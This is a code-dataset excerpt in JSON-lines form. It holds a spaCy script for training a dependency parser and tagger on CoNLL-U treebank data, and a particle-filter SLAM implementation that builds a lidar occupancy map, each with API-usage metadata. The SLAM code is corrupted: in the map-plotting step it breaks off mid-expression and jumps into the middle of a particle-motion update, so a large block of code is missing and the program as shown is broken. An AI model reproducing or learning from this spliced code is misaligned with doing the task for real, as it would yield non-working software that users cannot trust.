{"api_name": "epic.categories.models.Category.objects.get", "line_number": 207, "usage_type": "call"}, {"api_name": "epic.categories.models.Category.objects", "line_number": 207, "usage_type": "attribute"}, {"api_name": "epic.categories.models.Category", "line_number": 207, "usage_type": "name"}, {"api_name": "epic.categories.constants.NO_CATEGORY", "line_number": 207, "usage_type": "name"}, {"api_name": "epic.categories.models.CannotDeleteNoCategoryException", "line_number": 212, "usage_type": "name"}]} +{"seq_id": "227061763", "text": "'''Train for CONLL 2017 UD treebank evaluation. Takes .conllu files, writes\n.conllu format for development data, allowing the official scorer to be used.\n'''\nfrom __future__ import unicode_literals\nimport plac\nimport tqdm\nimport re\nimport sys\nimport spacy\nimport spacy.util\nfrom spacy.tokens import Doc\nfrom spacy.gold import GoldParse, minibatch\nfrom spacy.syntax.nonproj import projectivize\nfrom collections import Counter\nfrom timeit import default_timer as timer\n\nimport random\nimport numpy.random\n\nfrom spacy._align import align\n\nrandom.seed(0)\nnumpy.random.seed(0)\n\ndef prevent_bad_sentences(doc):\n '''This is an example pipeline component for fixing sentence segmentation\n mistakes. The component sets is_sent_start to False, which means the\n parser will be prevented from making a sentence boundary there. The\n rules here aren't necessarily a good idea.'''\n for token in doc[1:]:\n if token.nbor(-1).text == ',':\n token.is_sent_start = False\n elif not token.nbor(-1).whitespace_:\n token.is_sent_start = False\n elif not token.nbor(-1).is_punct:\n token.is_sent_start = False\n elif token.nbor(-1).is_left_punct:\n token.is_sent_start = False\n return doc\n\n\ndef load_model(lang):\n '''This shows how to adjust the tokenization rules, to special-case\n for ways the CoNLLU tokenization differs. We need to get the tokenizer\n accuracy high on the various treebanks in order to do well. 
If we don't\n align on a content word, all dependencies to and from that word will\n be marked as incorrect.\n '''\n English = spacy.util.get_lang_class(lang)\n English.Defaults.token_match = re.compile(r'=+|!+|\\?+|\\*+|_+').match\n nlp = English()\n nlp.tokenizer.add_special_case('***', [{'ORTH': '***'}])\n nlp.tokenizer.add_special_case(\"):\", [{'ORTH': \")\"}, {\"ORTH\": \":\"}])\n nlp.tokenizer.add_special_case(\"and/or\", [{'ORTH': \"and\"}, {\"ORTH\": \"/\"}, {\"ORTH\": \"or\"}])\n nlp.tokenizer.add_special_case(\"non-Microsoft\", [{'ORTH': \"non-Microsoft\"}])\n nlp.tokenizer.add_special_case(\"mis-matches\", [{'ORTH': \"mis-matches\"}])\n nlp.tokenizer.add_special_case(\"X.\", [{'ORTH': \"X\"}, {\"ORTH\": \".\"}])\n nlp.tokenizer.add_special_case(\"b/c\", [{'ORTH': \"b/c\"}])\n return nlp\n \n\ndef get_token_acc(docs, golds):\n '''Quick function to evaluate tokenization accuracy.'''\n miss = 0\n hit = 0\n for doc, gold in zip(docs, golds):\n for i in range(len(doc)):\n token = doc[i]\n align = gold.words[i]\n if align == None:\n miss += 1\n else:\n hit += 1\n return miss, hit\n\n\ndef golds_to_gold_tuples(docs, golds):\n '''Get out the annoying 'tuples' format used by begin_training, given the\n GoldParse objects.'''\n tuples = []\n for doc, gold in zip(docs, golds):\n text = doc.text\n ids, words, tags, heads, labels, iob = zip(*gold.orig_annot)\n sents = [((ids, words, tags, heads, labels, iob), [])]\n tuples.append((text, sents))\n return tuples\n\ndef split_text(text):\n return [par.strip().replace('\\n', ' ')\n for par in text.split('\\n\\n')]\n \n\ndef read_data(nlp, conllu_file, text_file, raw_text=True, oracle_segments=False,\n limit=None):\n '''Read the CONLLU format into (Doc, GoldParse) tuples. If raw_text=True,\n include Doc objects created using nlp.make_doc and then aligned against\n the gold-standard sequences. If oracle_segments=True, include Doc objects\n created from the gold-standard segments. At least one must be True.'''\n if not raw_text and not oracle_segments:\n raise ValueError(\"At least one of raw_text or oracle_segments must be True\")\n paragraphs = split_text(text_file.read())\n conllu = read_conllu(conllu_file)\n # sd is spacy doc; cd is conllu doc\n # cs is conllu sent, ct is conllu token\n docs = []\n golds = []\n for doc_id, (text, cd) in enumerate(zip(paragraphs, conllu)):\n doc_words = []\n doc_tags = []\n doc_heads = []\n doc_deps = []\n doc_ents = []\n for cs in cd:\n sent_words = []\n sent_tags = []\n sent_heads = []\n sent_deps = []\n for id_, word, lemma, pos, tag, morph, head, dep, _1, _2 in cs:\n if '.' 
in id_:\n continue\n if '-' in id_:\n continue\n id_ = int(id_)-1\n head = int(head)-1 if head != '0' else id_\n sent_words.append(word)\n sent_tags.append(tag)\n sent_heads.append(head)\n sent_deps.append('ROOT' if dep == 'root' else dep)\n if oracle_segments:\n sent_heads, sent_deps = projectivize(sent_heads, sent_deps)\n docs.append(Doc(nlp.vocab, words=sent_words))\n golds.append(GoldParse(docs[-1], words=sent_words, heads=sent_heads,\n tags=sent_tags, deps=sent_deps,\n entities=['-']*len(sent_words)))\n for head in sent_heads:\n doc_heads.append(len(doc_words)+head)\n doc_words.extend(sent_words)\n doc_tags.extend(sent_tags)\n doc_deps.extend(sent_deps)\n doc_ents.extend(['-']*len(sent_words))\n # Create a GoldParse object for the sentence\n doc_heads, doc_deps = projectivize(doc_heads, doc_deps)\n if raw_text:\n docs.append(nlp.make_doc(text))\n golds.append(GoldParse(docs[-1], words=doc_words, tags=doc_tags,\n heads=doc_heads, deps=doc_deps,\n entities=doc_ents))\n if limit and doc_id >= limit:\n break\n return docs, golds\n\n\ndef refresh_docs(docs):\n vocab = docs[0].vocab\n return [Doc(vocab, words=[t.text for t in doc],\n spaces=[t.whitespace_ for t in doc])\n for doc in docs]\n\n\ndef read_conllu(file_):\n docs = []\n doc = None\n sent = []\n for line in file_:\n if line.startswith('# newdoc'):\n if doc:\n docs.append(doc)\n doc = []\n elif line.startswith('#'):\n continue\n elif not line.strip():\n if sent:\n if doc is None:\n docs.append([sent])\n else:\n doc.append(sent)\n sent = []\n else:\n sent.append(line.strip().split())\n if sent:\n if doc is None:\n docs.append([sent])\n else:\n doc.append(sent)\n if doc:\n docs.append(doc)\n return docs\n\n\ndef parse_dev_data(nlp, text_loc, conllu_loc, oracle_segments=False,\n joint_sbd=True):\n with open(text_loc) as text_file:\n with open(conllu_loc) as conllu_file:\n docs, golds = read_data(nlp, conllu_file, text_file,\n oracle_segments=oracle_segments)\n if joint_sbd:\n pass\n else:\n sbd = nlp.create_pipe('sentencizer')\n for doc in docs:\n doc = sbd(doc)\n for sent in doc.sents:\n sent[0].is_sent_start = True\n for word in sent[1:]:\n word.is_sent_start = False\n scorer = nlp.evaluate(zip(docs, golds))\n return docs, scorer\n\n\ndef print_progress(itn, losses, scorer):\n scores = {}\n for col in ['dep_loss', 'tag_loss', 'uas', 'tags_acc', 'token_acc',\n 'ents_p', 'ents_r', 'ents_f', 'cpu_wps', 'gpu_wps']:\n scores[col] = 0.0\n scores['dep_loss'] = losses.get('parser', 0.0)\n scores['ner_loss'] = losses.get('ner', 0.0)\n scores['tag_loss'] = losses.get('tagger', 0.0)\n scores.update(scorer.scores)\n tpl = '\\t'.join((\n '{:d}',\n '{dep_loss:.3f}',\n '{ner_loss:.3f}',\n '{uas:.3f}',\n '{ents_p:.3f}',\n '{ents_r:.3f}',\n '{ents_f:.3f}',\n '{tags_acc:.3f}',\n '{token_acc:.3f}',\n ))\n print(tpl.format(itn, **scores))\n\ndef print_conllu(docs, file_):\n for i, doc in enumerate(docs):\n file_.write(\"# newdoc id = {i}\\n\".format(i=i))\n for j, sent in enumerate(doc.sents):\n file_.write(\"# sent_id = {i}.{j}\\n\".format(i=i, j=j))\n file_.write(\"# text = {text}\\n\".format(text=sent.text))\n for k, t in enumerate(sent):\n if t.head.i == t.i:\n head = 0\n else:\n head = k + (t.head.i - t.i) + 1\n fields = [str(k+1), t.text, t.lemma_, t.pos_, t.tag_, '_',\n str(head), t.dep_.lower(), '_', '_']\n file_.write('\\t'.join(fields) + '\\n')\n file_.write('\\n')\n\n\ndef main(spacy_model, conllu_train_loc, text_train_loc, conllu_dev_loc, text_dev_loc,\n output_loc):\n nlp = load_model(spacy_model)\n vec_nlp = 
spacy.util.load_model('spacy/data/en_core_web_lg/en_core_web_lg-2.0.0')\n nlp.vocab.vectors = vec_nlp.vocab.vectors\n for lex in vec_nlp.vocab:\n _ = nlp.vocab[lex.orth_]\n with open(conllu_train_loc) as conllu_file:\n with open(text_train_loc) as text_file:\n docs, golds = read_data(nlp, conllu_file, text_file,\n oracle_segments=False, raw_text=True,\n limit=None)\n print(\"Create parser\")\n nlp.add_pipe(nlp.create_pipe('parser'))\n nlp.parser.add_multitask_objective('tag')\n nlp.parser.add_multitask_objective('sent_start')\n nlp.add_pipe(nlp.create_pipe('tagger'))\n for gold in golds:\n for tag in gold.tags:\n if tag is not None:\n nlp.tagger.add_label(tag)\n optimizer = nlp.begin_training(lambda: golds_to_gold_tuples(docs, golds))\n # Replace labels that didn't make the frequency cutoff\n actions = set(nlp.parser.labels)\n label_set = set([act.split('-')[1] for act in actions if '-' in act])\n for gold in golds:\n for i, label in enumerate(gold.labels):\n if label is not None and label not in label_set:\n gold.labels[i] = label.split('||')[0]\n n_train_words = sum(len(doc) for doc in docs)\n print(n_train_words)\n print(\"Begin training\")\n # Batch size starts at 1 and grows, so that we make updates quickly\n # at the beginning of training.\n batch_sizes = spacy.util.compounding(spacy.util.env_opt('batch_from', 1),\n spacy.util.env_opt('batch_to', 8),\n spacy.util.env_opt('batch_compound', 1.001))\n for i in range(30):\n docs = refresh_docs(docs)\n batches = minibatch(list(zip(docs, golds)), size=batch_sizes)\n with tqdm.tqdm(total=n_train_words, leave=False) as pbar:\n losses = {}\n for batch in batches:\n if not batch:\n continue\n batch_docs, batch_gold = zip(*batch)\n\n nlp.update(batch_docs, batch_gold, sgd=optimizer,\n drop=0.2, losses=losses)\n pbar.update(sum(len(doc) for doc in batch_docs))\n \n with nlp.use_params(optimizer.averages):\n dev_docs, scorer = parse_dev_data(nlp, text_dev_loc, conllu_dev_loc,\n oracle_segments=False, joint_sbd=True)\n print_progress(i, losses, scorer)\n with open(output_loc, 'w') as file_:\n print_conllu(dev_docs, file_)\n dev_docs, scorer = parse_dev_data(nlp, text_dev_loc, conllu_dev_loc,\n oracle_segments=False, joint_sbd=False)\n print_progress(i, losses, scorer)\n\n\nif __name__ == '__main__':\n plac.call(main)\n", "sub_path": "examples/training/conllu.py", "file_name": "conllu.py", "file_ext": "py", "file_size_in_byte": 11809, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "random.seed", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.random.random.seed", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.random.random", "line_number": 23, "usage_type": "attribute"}, {"api_name": "numpy.random", "line_number": 23, "usage_type": "name"}, {"api_name": "spacy.util.get_lang_class", "line_number": 49, "usage_type": "call"}, {"api_name": "spacy.util", "line_number": 49, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 50, "usage_type": "call"}, {"api_name": "spacy._align.align", "line_number": 69, "usage_type": "name"}, {"api_name": "spacy._align.align", "line_number": 70, "usage_type": "name"}, {"api_name": "spacy.syntax.nonproj.projectivize", "line_number": 130, "usage_type": "call"}, {"api_name": "spacy.tokens.Doc", "line_number": 131, "usage_type": "call"}, {"api_name": "spacy.gold.GoldParse", "line_number": 132, "usage_type": "call"}, {"api_name": "spacy.syntax.nonproj.projectivize", "line_number": 142, "usage_type": 
"call"}, {"api_name": "spacy.gold.GoldParse", "line_number": 145, "usage_type": "call"}, {"api_name": "spacy.tokens.Doc", "line_number": 155, "usage_type": "call"}, {"api_name": "spacy.util.load_model", "line_number": 252, "usage_type": "call"}, {"api_name": "spacy.util", "line_number": 252, "usage_type": "attribute"}, {"api_name": "spacy.util.compounding", "line_number": 283, "usage_type": "call"}, {"api_name": "spacy.util", "line_number": 283, "usage_type": "attribute"}, {"api_name": "spacy.util.env_opt", "line_number": 283, "usage_type": "call"}, {"api_name": "spacy.util.env_opt", "line_number": 284, "usage_type": "call"}, {"api_name": "spacy.util", "line_number": 284, "usage_type": "attribute"}, {"api_name": "spacy.util.env_opt", "line_number": 285, "usage_type": "call"}, {"api_name": "spacy.util", "line_number": 285, "usage_type": "attribute"}, {"api_name": "spacy.gold.minibatch", "line_number": 288, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 289, "usage_type": "call"}, {"api_name": "plac.call", "line_number": 312, "usage_type": "call"}]} +{"seq_id": "23865486", "text": "#*\n# SLAM.py: the implementation of SLAM\n# created and maintained by Ty Nguyen\n# tynguyen@seas.upenn.edu\n# Feb 2020\n#*\n# from google.colab.patches import cv2_imshow\nfrom scipy.special import logsumexp\n\nimport numpy as np\nfrom numpy import cos,sin\nimport matplotlib.pyplot as plt\nimport load_data as ld\nimport os, sys, time\nimport p3_util as ut\nfrom read_data import LIDAR, JOINTS\nimport probs_utils as prob\nimport math\nimport cv2\nimport transformations\nfrom importlib import reload\nreload(transformations)\nimport transformations as tf\nfrom copy import deepcopy\nfrom mpl_toolkits.mplot3d import Axes3D\nimport logging\nif (sys.version_info > (3, 0)):\n import pickle\nelse:\n import cPickle as pickle\n\nlogger = logging.getLogger()\nlogger.setLevel(os.environ.get(\"LOGLEVEL\", \"INFO\"))\ninterval = 1\n\nclass SLAM(object):\n def __init__(self):\n self._characterize_sensor_specs()\n \n def _read_data(self, src_dir, dataset=0, split_name='train'):\n self.dataset_= str(dataset)\n if split_name.lower() not in src_dir:\n src_dir = src_dir + '/' + split_name\n print('\\n------Reading Lidar and Joints (IMU)------')\n self.lidar_ = LIDAR(dataset=self.dataset_, data_folder=src_dir, name=split_name + '_lidar'+ self.dataset_)\n print ('\\n------Reading Joints Data------')\n self.joints_ = JOINTS(dataset=self.dataset_, data_folder=src_dir, name=split_name + '_joint'+ self.dataset_)\n \n self.num_data_ = len(self.lidar_.data_)\n # Position of odometry\n self.odo_indices_ = np.empty((2,self.num_data_),dtype=np.int64)\n lidar_data = self.lidar_.data_\n # remove bias for odometry, init pose is (0,0,0)\n yaw_bias = lidar_data[0]['rpy'][0,2]\n pose_bias = lidar_data[0]['pose'][0,:2]\n for i in range(len(lidar_data)):\n lidar_data[i]['rpy'][0,2] -= yaw_bias\n lidar_data[i]['pose'][0,:2] -= pose_bias\n self.lidar_.data_ = lidar_data\n def _characterize_sensor_specs(self, p_thresh=None):\n # High of the lidar from the ground (meters)\n self.h_lidar_ = 0.93 + 0.33 + 0.15\n # Accuracy of the lidar\n self.p_true_ = 9\n self.p_false_ = 1.0/9\n \n #TODO: set a threshold value of probability to consider a map's cell occupied \n self.p_thresh_ = 0.6 if p_thresh is None else p_thresh # > p_thresh => occupied and vice versa\n # Compute the corresponding threshold value of logodd\n self.logodd_thresh_ = prob.log_thresh_from_pdf_thresh(self.p_thresh_)\n \n\n def _init_particles(self, num_p=100, mov_cov=None, 
particles=None, weights=None, percent_eff_p_thresh=None):\n # Particles representation\n self.num_p_ = num_p\n #self.percent_eff_p_thresh_ = percent_eff_p_thresh\n self.particles_ = np.zeros((3,self.num_p_),dtype=np.float64) if particles is None else particles\n \n # Weights for particles\n self.weights_ = 1.0/self.num_p_*np.ones(self.num_p_) if weights is None else weights\n\n # Position of the best particle after update on the map\n self.best_p_indices_ = np.zeros((2,self.num_data_),dtype=np.int64)\n #self.best_p_indices_[:,0] = np.zeros(2)\n # Best particles\n self.best_p_ = np.zeros((3,self.num_data_))\n #self.best_p_[:,0] = np.zeros(3)\n # Corresponding time stamps of best particles\n self.time_ = np.empty(self.num_data_)\n \n # Covariance matrix of the movement model\n tiny_mov_cov = np.array([[1e-8, 0, 0],[0, 1e-8, 0],[0, 0 , 1e-8]])\n self.mov_cov_ = mov_cov if mov_cov is not None else tiny_mov_cov\n # To generate random noise: x, y, z = np.random.multivariate_normal(np.zeros(3), mov_cov, 1).T\n # this return [x], [y], [z]\n\n # Threshold for resampling the particles\n self.percent_eff_p_thresh_ = percent_eff_p_thresh\n\n def _init_map(self, map_resolution=0.05):\n '''*Input: resolution of the map - distance between two grid cells (meters)'''\n # Map representation\n MAP= {}\n MAP['res'] = map_resolution #meters\n MAP['xmin'] = -30 #meters\n MAP['ymin'] = -30\n MAP['xmax'] = 30\n MAP['ymax'] = 30\n MAP['sizex'] = int(np.ceil((MAP['xmax'] - MAP['xmin']) / MAP['res'] + 1)) #total cells\n MAP['sizey'] = int(np.ceil((MAP['ymax'] - MAP['ymin']) / MAP['res'] + 1)) #total cells\n belief = 0.7\n MAP['occ_d'] = np.log(belief/(1-belief))\n MAP['free_d'] = np.log((1-belief)/belief)*.5\n occ_thres = 0.9\n free_thres = 0.2\n MAP['occ_thres'] = prob.log_thresh_from_pdf_thresh(occ_thres)\n MAP['free_thres'] = prob.log_thresh_from_pdf_thresh(free_thres)\n MAP['bound'] = 100 # allow log odds recovery\n MAP['map'] = np.zeros((MAP['sizex'],MAP['sizey']),dtype=float) #DATA TYPE: char or int8\n # MAP['map'] = np.random.randint(-100,100,size=[MAP['sizex'],MAP['sizey']]).astype(float)\n self.MAP_ = MAP\n\n self.log_odds_ = np.zeros((self.MAP_['sizex'],self.MAP_['sizey']),dtype = np.float64)\n self.occu_ = np.ones((self.MAP_['sizex'],self.MAP_['sizey']),dtype = np.float64)\n # Number of measurements for each cell\n self.num_m_per_cell_ = np.zeros((self.MAP_['sizex'],self.MAP_['sizey']),dtype = np.uint64)\n\n\n def _build_first_map(self,t0=0,use_lidar_yaw=True):\n \"\"\"Build the first map using first lidar and plot it\"\"\"\n self.t0 = t0\n # Extract a ray from lidar data, transform it to x-y-z frame\n print('\\n--------Doing build the first map--------')\n lidar_idx = t0\n lidar_scan = self.lidar_.data_[lidar_idx]['scan']\n num_beams = lidar_scan.shape[1]\n lidar_angles = np.linspace(start=-135*np.pi/180, stop=135*np.pi/180, num=num_beams).reshape(1,-1)\n Pose = self.particles_[:, np.argmax(self.weights_)]\n selected_range = np.logical_and(lidar_scan>0.1, lidar_scan<30) # lidar spec\n lidar_scan_seleted_range = lidar_scan[selected_range]\n lidar_angles_selected_range = lidar_angles[selected_range]\n x_lidar = lidar_scan_seleted_range * cos(lidar_angles_selected_range)\n y_lidar = lidar_scan_seleted_range * sin(lidar_angles_selected_range)\n z_lidar = np.zeros(len(lidar_scan_seleted_range))\n lidar_selected_hit = np.vstack((x_lidar,y_lidar,z_lidar))# 3*n\n\n # find closest joint data(synchronization)\n joint_idx = np.argmin(np.abs(self.joints_.data_['ts']-self.lidar_.data_[lidar_idx]['t']))\n joint_angles 
= self.joints_.data_['head_angles'][:,joint_idx]\n\n # transform hit from lidar to world coordinate, also remove ground hitting\n world_hit = tf.lidar2world(lidar_selected_hit, joint_angles,self.lidar_.data_[lidar_idx]['rpy'][0,:],pose=Pose)\n occ = tf.world2map(world_hit[:2],self.MAP_)\n # update log odds for occupied grid, Note: pixels access should be (column, row)\n self.MAP_['map'][occ[1], occ[0]] += self.MAP_['occ_d']-self.MAP_['free_d'] # will add back later\n # update log odds for free grid, using contours to mask region between pose and hit\n mask = np.zeros(self.MAP_['map'].shape)\n contour = np.hstack((tf.world2map(Pose[:2],self.MAP_).reshape(-1,1), occ))\n cv2.drawContours(image=mask, contours = [contour.T], contourIdx = -1, color = self.MAP_['free_d'], thickness=-1)\n self.MAP_['map'] += mask\n # keep log odds within boundary, to allow recovery\n self.MAP_['map'][self.MAP_['map']>self.MAP_['bound']] = self.MAP_['bound']\n self.MAP_['map'][self.MAP_['map']<-self.MAP_['bound']] = -self.MAP_['bound']\n # print(self.MAP_['map'])\n\n # plot the first map\n h, w = self.MAP_['map'].shape\n Plot = np.zeros((h,w,3),np.uint8)\n # Trajectory = []\n occ_mask = self.MAP_['map']>self.MAP_['occ_thres']\n free_mask = self.MAP_['map']ilk', world_2_body_rots, d_xy_in_body))\n self.particles_[2] += d_theta\n # print('t=',t,'particle=',self.particles_)\n # apply noise, set or use tiny_cov\n self.mov_cov_ = np.array([[0.001,0,0],[0,0.001,0],[0,0,0.001]])\n noise = np.random.multivariate_normal(np.zeros(3), self.mov_cov_, size=self.num_p_).T\n # # self.particles_[:2] += np.squeeze(np.einsum('ijk,ik->jk', world_2_body_rots, noise[:2]))\n # # self.particles_[2] += noise[2]\n self.particles_ += noise # slightly incorrect but faster??\n # print('add noise')\n # print(f't={t},self.particles_={self.particles_}')\n\n def _update(self,t,t0=0,fig='on'):\n if t == t0:\n self._build_first_map(t0,use_lidar_yaw=True)\n return\n else:\n #######################################################################################\n # UPDATE MAP\n ######################################################################################\n lidar_scan = self.lidar_.data_[t]['scan']\n num_beams = lidar_scan.shape[1]\n lidar_angles = np.linspace(start=-135*np.pi/180, stop=135*np.pi/180, num=num_beams).reshape(1,-1)\n selected_range = np.logical_and(lidar_scan>0.1, lidar_scan<30) # lidar spec\n # print('selected range=',np.where(selected_range==False))\n lidar_scan_seleted_range = lidar_scan[selected_range]\n lidar_angles_selected_range = lidar_angles[selected_range]\n x_lidar = lidar_scan_seleted_range * cos(lidar_angles_selected_range)\n y_lidar = lidar_scan_seleted_range * sin(lidar_angles_selected_range)\n z_lidar = np.zeros(len(lidar_scan_seleted_range))\n lidar_selected_hit = np.vstack((x_lidar,y_lidar,z_lidar))# 3*n\n # find closest joint data(synchronization)\n joint_idx = np.argmin(np.abs(self.joints_.data_['ts']-self.lidar_.data_[t]['t']))\n joint_angles = self.joints_.data_['head_angles'][:,joint_idx]\n # transform hit from lidar to world coordinate, also remove ground hitting\n self.best_p_[:,t] = self.particles_[:,np.argmax(self.weights_)]\n # print(f't={t},pose={self.best_p_[:,t]}')\n world_hit = tf.lidar2world(lidar_selected_hit, joint_angles,self.lidar_.data_[t]['rpy'][0,:], pose=self.best_p_[:,t])\n # print('t=',t,'world_hit=',world_hit)\n occ = tf.world2map(world_hit[:2],self.MAP_)\n # update log odds for occupied grid, Note: pixels access should be (column, row)\n self.MAP_['map'][occ[1], occ[0]] += 
self.MAP_['occ_d']-self.MAP_['free_d'] # will add back later\n # update log odds for free grid, using contours to mask region between pose and hit\n mask = np.zeros(self.MAP_['map'].shape)\n best_particle_map = tf.world2map(self.best_p_[:2,t],self.MAP_).reshape(-1,1)\n contour = np.hstack((best_particle_map, occ))\n cv2.drawContours(image=mask, contours = [contour.T], contourIdx = -1, color = self.MAP_['free_d'], thickness=-1)\n self.MAP_['map'] += mask\n # keep log odds within boundary, to allow recovery\n self.MAP_['map'][self.MAP_['map']>self.MAP_['bound']] = self.MAP_['bound']\n self.MAP_['map'][self.MAP_['map']<-self.MAP_['bound']] = -self.MAP_['bound']\n # print('map=',np.where(self.MAP_['map']>0))\n ############################################################################################\n #UPDATE PARTICLES\n ############################################################################################\n # convert each particle into world frame\n particles_hit = tf.lidar2world(lidar_selected_hit,joint_angles,self.lidar_.data_[t]['rpy'][0,:],Particles=self.particles_)\n # get matching between map and particle lidar reading\n corr = np.zeros(self.num_p_)\n for i in range(self.num_p_):\n occ = tf.world2map(particles_hit[:2,:,i], self.MAP_)\n corr[i] = np.sum(self.MAP_['map'][occ[1],occ[0]]>self.MAP_['occ_thres'])\n corr /= 10 # by divide, adding a temperature to the softmax function\n # update particle weights\n log_weights = np.log(self.weights_) + corr\n log_weights -= np.max(log_weights) + logsumexp(log_weights - np.max(log_weights))\n # print(f'log_weights={log_weights}')\n self.weights_ = np.exp(log_weights)\n self.best_p_[:,t] = self.particles_[:,np.argmax(self.weights_)]\n occ = tf.world2map(self.best_p_[:2,t],self.MAP_)\n self.best_p_indices_[:,t] = np.array([occ[1,0],occ[0,0]])\n\n # print(f'best_p_indices={self.best_p_indices_[:,t]}')\n MAP = self.MAP_\n return MAP\n \n", "sub_path": "code/SLAM/SLAM.py", "file_name": "SLAM.py", "file_ext": "py", "file_size_in_byte": 14785, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "importlib.reload", "line_number": 22, "usage_type": "call"}, {"api_name": "sys.version_info", "line_number": 27, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 32, "usage_type": "call"}, {"api_name": "os.environ.get", "line_number": 33, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 33, "usage_type": "attribute"}, {"api_name": "read_data.LIDAR", "line_number": 45, "usage_type": "call"}, {"api_name": "read_data.JOINTS", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 51, "usage_type": "call"}, {"api_name": "numpy.int64", "line_number": 51, "usage_type": "attribute"}, {"api_name": "probs_utils.log_thresh_from_pdf_thresh", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 77, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 77, "usage_type": "attribute"}, {"api_name": "numpy.ones", "line_number": 80, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 83, "usage_type": "call"}, {"api_name": "numpy.int64", "line_number": 83, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 86, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 89, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 92, "usage_type": "call"}, {"api_name": "numpy.ceil", "line_number": 109, "usage_type": "call"}, 
{"api_name": "numpy.ceil", "line_number": 110, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 112, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 113, "usage_type": "call"}, {"api_name": "probs_utils.log_thresh_from_pdf_thresh", "line_number": 116, "usage_type": "call"}, {"api_name": "probs_utils.log_thresh_from_pdf_thresh", "line_number": 117, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 119, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 123, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 123, "usage_type": "attribute"}, {"api_name": "numpy.ones", "line_number": 124, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 124, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 126, "usage_type": "call"}, {"api_name": "numpy.uint64", "line_number": 126, "usage_type": "attribute"}, {"api_name": "numpy.linspace", "line_number": 137, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 137, "usage_type": "attribute"}, {"api_name": "numpy.argmax", "line_number": 138, "usage_type": "call"}, {"api_name": "numpy.logical_and", "line_number": 139, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 142, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 143, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 144, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 145, "usage_type": "call"}, {"api_name": "numpy.argmin", "line_number": 148, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 148, "usage_type": "call"}, {"api_name": "transformations.lidar2world", "line_number": 152, "usage_type": "call"}, {"api_name": "transformations.world2map", "line_number": 153, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 157, "usage_type": "call"}, {"api_name": "numpy.hstack", "line_number": 158, "usage_type": "call"}, {"api_name": "transformations.world2map", "line_number": 158, "usage_type": "call"}, {"api_name": "cv2.drawContours", "line_number": 159, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 168, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 168, "usage_type": "attribute"}, {"api_name": "numpy.logical_not", "line_number": 172, "usage_type": "call"}, {"api_name": "numpy.logical_or", "line_number": 172, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 182, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 192, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 192, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 192, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 193, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 193, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 200, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 203, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 203, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 203, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 204, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 204, "usage_type": "call"}, {"api_name": "numpy.squeeze", "line_number": 206, "usage_type": "call"}, {"api_name": "numpy.einsum", "line_number": 206, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 210, "usage_type": "call"}, {"api_name": "numpy.random.multivariate_normal", "line_number": 211, "usage_type": 
"call"}, {"api_name": "numpy.random", "line_number": 211, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 211, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 228, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 228, "usage_type": "attribute"}, {"api_name": "numpy.logical_and", "line_number": 229, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 233, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 234, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 235, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 236, "usage_type": "call"}, {"api_name": "numpy.argmin", "line_number": 238, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 238, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 241, "usage_type": "call"}, {"api_name": "transformations.lidar2world", "line_number": 243, "usage_type": "call"}, {"api_name": "transformations.world2map", "line_number": 245, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 249, "usage_type": "call"}, {"api_name": "transformations.world2map", "line_number": 250, "usage_type": "call"}, {"api_name": "numpy.hstack", "line_number": 251, "usage_type": "call"}, {"api_name": "cv2.drawContours", "line_number": 252, "usage_type": "call"}, {"api_name": "transformations.lidar2world", "line_number": 262, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 264, "usage_type": "call"}, {"api_name": "transformations.world2map", "line_number": 266, "usage_type": 